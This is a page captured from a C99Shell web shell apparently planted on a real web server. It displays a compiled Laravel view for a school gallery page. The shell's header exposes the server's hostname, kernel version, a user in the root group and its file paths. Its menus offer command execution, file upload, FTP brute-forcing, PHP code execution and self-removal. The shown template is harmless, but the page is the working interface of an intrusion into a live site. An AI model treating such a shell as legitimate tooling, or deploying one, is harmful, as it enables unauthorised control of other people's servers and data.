!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/school.picotech.app/public_html/storage/framework/views/   drwxr-xr-x
Free 28.38 GB of 117.98 GB (24.06%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     a5835d451f148a1d20f58a09c2d8ca3e2cf8f92f.php (2.16 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php $__env->startSection('title'); ?>
    <?php echo e(get_school_name()); ?>

<?php $__env->stopSection(); ?>


<?php $__env->startSection('css'); ?>
    <style>
        .teachers_name{
            background: #0019a6c2;
        }
        .no-data-heading{
            margin-top: 10px;
        }
    </style>
<?php $__env->stopSection(); ?>

<?php $__env->startSection('content'); ?>
    <?php

        $bannerSliderSection 
json_decode(get_settings('banner_slider_section'));
        
$head_teacher_message_section json_decode(get_settings('head_teacher_message_sec'));
        
$about_school_sec json_decode(get_settings('about_school_sec'));

    
?>


    <div class="leftCon">
        <h2>গ্যালারি</h2>
        <ul class="teachers_list">

            <?php if(isset($gallery_images) && $gallery_images): ?>
            <?php $__currentLoopData $gallery_images$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $gallery_image): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>

            <li>
                <div class="teachers_img">

                        <?php if(isset($gallery_image) && isset($gallery_image->image)): ?>
                        <a href="<?php echo e(asset('uploads/'.$gallery_image->image)); ?>" target="_blank">
                            <img src="<?php echo e(asset('uploads/'.$gallery_image->image)); ?>"
                            alt=""/>
                        </a>
                        <?php endif; ?>

                </div><!-- End of teachers_img-->

            </li>
            <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
            <?php else: ?>
                <h4 class="no-data-heading">কোন তথ্য পাওয়া যায়নি</h4>
            <?php endif; ?>

        </ul>


    </div>

<?php $__env->stopSection(); ?>

<?php $__env->startSection('js'); ?>


<?php $__env->stopSection(); ?>

<?php echo $__env->make('frontend.index'\Illuminate\Support\Arr::except(get_defined_vars(), ['__data''__path']))->render(); ?><?php /**PATH /home/picotech/domains/school.picotech.app/public_html/resources/views/frontend/gallery.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0033 ]--